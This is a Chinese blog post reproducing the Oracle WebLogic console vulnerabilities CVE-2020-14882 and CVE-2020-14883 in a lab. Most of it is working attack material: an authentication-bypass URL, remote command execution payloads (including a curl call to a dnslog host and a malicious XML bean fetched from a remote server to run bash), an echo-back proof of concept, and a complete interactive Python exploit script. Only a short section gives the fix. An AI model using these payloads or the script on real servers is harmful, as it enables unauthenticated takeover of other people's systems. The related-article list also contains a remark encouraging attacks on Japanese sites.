CVE-2020-14882 未授权访问 CVE-2020-148823 RCE 含利用脚本

最新推荐文章于 2025-02-10 20:29:32 发布
置顶 最新推荐文章于 2025-02-10 20:29:32 发布
阅读量913 收藏 1
点赞数
分类专栏: web漏洞复现 文章标签: weblogic 安全漏洞 脚本语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kksunkanghui/article/details/109562069
版权
该博客详细介绍了CVE-2020-14882漏洞,包括漏洞描述、影响版本、复现过程,特别是针对RCE(远程命令执行)的多种方法,如无回显配合dnslog的利用,以及可回显的POC。同时,提供了修复方案和漏洞利用脚本,帮助读者理解并防范此安全威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

0x01漏洞描述

0x02影响版本

0x03漏洞复现

1.未授权访问(低权限)

2.RCE(远程命令执行)无回显 可以搭配dnslog

3.使用dnslog(RCE)

4.被动访问XML文件方式(RCE)

5.可回显的POC(RCE)

0x04修复方案

0x05漏洞利用脚本:

0x06脚本测试图:

0x01漏洞描述

 
2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。
远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。
 
 

0x02影响版本

Oracle WeblogicServer 10.3.6.0.0
Oracle WeblogicServer 12.1.3.0.0
Oracle WeblogicServer 12.2.1.3.0
Oracle WeblogicServer 12.2.1.4.0
Oracle WeblogicServer 14.1.1.0.0
 

0x03漏洞复现

 

环境搭建:使用vulhub搭建环境
测试版本:administration console 12c 12.2.1.3.0

  • 1.未授权访问(低权限)

  • payload(GET) 
/console/css/%252e%252e%252fconsole.portal

 

  • 截图:
 

  • 2.RCE(远程命令执行)无回显 可以搭配dnslog

  • payload:(GET)
  • dnslog    
   
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/sunsanhui');")

 

 
 
 
 
docker ps  #查看docker信息
 
docker exec -it 300eba524103 /bin/bash    #进入docker
 
 
cd /tmp/    #进入docker的tmp目录查看是否命令执行成功
 
 

 

  • 3.使用dnslog(RCE)

  • paylaod:
  
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20XXXXX.ceye.io');") 

 

 

  • 4.被动访问XML文件方式(RCE)

  • 缺点:需要Weblogic的服务器能够访问到恶意XML
  • payload
首先构造恶意的XML文件 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

 

例如将其放在了 http://example.com/rce.xml
  
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

 

5.可回显的POC(RCE)

  
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
Host: 192.168.222.135:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
cmd: id

 

 

0x04修复方案

 

1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。
2、此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
 

0x05漏洞利用脚本:

源码 基于py3.8.1 
import requests
import re
import http.client
import urllib3

name = '''
   _______      ________    ___   ___ ___   ___        __ _  _   ___   ___ ____  
  / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | || | / _ \ / _ \___ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) |__) |
 | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |__   _> _ < > _ <|__ < 
 | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |  | || (_) | (_) |__) |
  \_____|   \/   |______|  |____|\___/____|\___/       |_|  |_| \___/ \___/____/ 
                                                             DESIGN BY Skhcats

'''

print(name)

urllib3.disable_warnings()
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'


def send(host, poc, cmd):
    text = host + poc
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36'
    }
    header['cmd'] = cmd
    try:
        res = requests.get(text, verify=False, headers=header, stream=True,timeout=5)
        if res.status_code == requests.codes.ok:
            res.encoding = 'utf-8'
            if 'html' in res.text:
                return '目标主机可能不存在此命令'
            else:
                return res.text
        else:
            return '状态码:'+res.status_code
    except Exception as e:
        print(e)
        print('致命错误/目标主机可能不存在此漏洞')
        exit(0)


if __name__ == '__main__':
    host = re.findall(r'https?://.+/',str(input("host(start with 'http://' or 'https://'):"))+r'/')[0]
    poc = r'''/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')'''
    while True:
        cmd = input('cmd&> ')
        res = send(host, poc, cmd)
        print(res)

 

 

 

0x06脚本测试图:

 
 
 
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1655
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
CVE-2020-14882_ALL综合利用工具
网络安全。
12-07 2661
简介 CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块:requests、http.client (工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。) 命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 工具地址:https://github.com/GGyao/CVE-2020-14882_ALL(喜欢的点个star喔) 选项 功能一:命令回显 python3 CVE-20
CVE-2020-14882
最新发布
Dikesi的博客
02-10 1149
Weblogic未授权命令执行漏洞
Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现
2301_77132421的博客
07-05 1264
攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7327
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
【漏洞复现】Weblogic未授权命令执行漏洞( CVE-2020-14882
weixin_43486390的博客
12-17 2402
CVE-2020-14882
CVE-2020-0796 检测及利用工具1
08-03
标题提及的"CVE-2020-0796"是2020年发现的一个严重安全漏洞,被称作"SMBGhost"或"Windows SMBv3 RCE"漏洞。该漏洞存在于Microsoft的Server Message Block (SMB) v3协议中,允许远程攻击者在未打补丁的系统上执行任意...
CVE-2020-14882 Oracle WebLogic远程命令执行漏洞
dearya123的博客
06-28 2891
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server Console 多版本存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server,受影响版本如下: 10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本,
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 535
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
weblogic未授权访问漏洞复现(CVE-2020-14882
Armandhe的博客
06-07 5672
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1562
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞,远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在未经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
CVE-2020-14882 weblogic未授权远程命令执行漏洞
栉风沐雪的博客
02-22 5134
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
CVE-2020-14882Weblogic Console 权限绕过深入解析
爱国小白帽
11-05 7030
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110501 报告来源:360CERT 报告作者:Hu3sky 更新日期:2020-11-05 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC 已经公开,相关漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构
CVE-2020-14882weblogic 未授权命令执行漏洞验证及修复
weixin_38896449的博客
12-02 4019
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 2.影响版本 Oracle Web
渗透测试系列:weblogic文件路径确认(cve-2020-14882
weixin_54626591的博客
01-12 1251
weblogic文件路径确认(cve-2020-14882
weblogic-CVE-2020-14882CVE-2020-14883
jjxsir的博客
05-20 678
2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。依旧显示404页面,进容器里面看看命令是否执行。
探索CVE-2020-14882:一款全面的安全研究工具
gitblog_00093的博客
03-30 390
探索CVE-2020-14882:一款全面的安全研究工具 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的世界里,了解并应对漏洞是至关重要的。项目是一个专注于研究和解决CVE-2020-14882漏洞的开源平台。该项目旨在帮助开发者、安全研究人员和系统管理员深入理解这一特定的安全威胁,并提供有效的防御策略。 项目简介 CVE-2020-14882是一种影响F5 BIG...
CVE-2020-1938漏洞利用工具-TomcatAjpScanner
根据提供的文件信息,CVE-2020-1938TomcatAjpScanner-master.zip是一个用于检测和利用CVE-2020-1938漏洞的工具包。这个工具可能包一个或多个脚本,用于扫描网络上的Tomcat服务器,寻找具有AJP连接器且未打上相关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值